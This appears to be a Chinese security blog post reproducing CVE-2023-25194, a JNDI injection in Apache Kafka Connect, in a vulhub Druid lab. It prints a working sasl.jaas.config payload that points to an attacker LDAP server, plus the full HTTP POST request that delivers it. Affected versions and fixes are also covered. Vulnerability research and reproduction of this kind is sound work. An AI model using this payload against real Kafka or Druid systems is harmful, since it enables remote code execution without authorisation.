漏洞原理
Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。
通过 Aiven API 或 Kafka Connect REST API 配置连接器时,攻击者可以为连接器设置database.history.producer.sasl.jaas.config连接器属性io.debezium.connector.mysql.MySqlConnector。其他 debezium 连接器也可能如此。通过将连接器值设置为"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
漏洞影响范围
2.3.0 <= Apache Kafka <= 3.3.2
漏洞复现过程
我是通过vulhub下载的环境,下载后直接启动即可。
打开页面,漏洞点在Load data功能页中。
在Load data功能页中的Streaming功能中。
在该功能中,将payload填写到Consumer properties属性值中即可。
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.204.129:1389/bip2vt\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
在payload提交前,请先在vps机器中开启ldap服务。
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 192.168.204.134:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 874
Origin: http://192.168.204.134:8888
DNT: 1
Connection: close
Referer: http://192.168.204.134:8888/unified-console.html
Cookie: io=iiZapP9jVyiNUZegAAAF
{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.204.129:1389/bip2vt\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"},"topic":"aa","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
使用低版本的jdk中的ldap服务即可。
修复建议
1、升级版本。
2、无法升级的用户可通过验证Kafka Connect连接器配置,仅允许受信任的JNDI配置来缓解此漏洞。
参考链接
Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194):https://blog.csdn.net/qq_41904294/article/details/129634971?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-129634971-blog-128962935.235%5Ev35%5Epc_relevant_default_base&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-129634971-blog-128962935.235%5Ev35%5Epc_relevant_default_base&utm_relevant_index=2
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞:https://blog.csdn.net/Fiverya/article/details/128964828
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析:https://blog.csdn.net/qq_38154820/article/details/129742672
版权归原作者 biddogegg 所有, 如有侵权,请联系我们删除。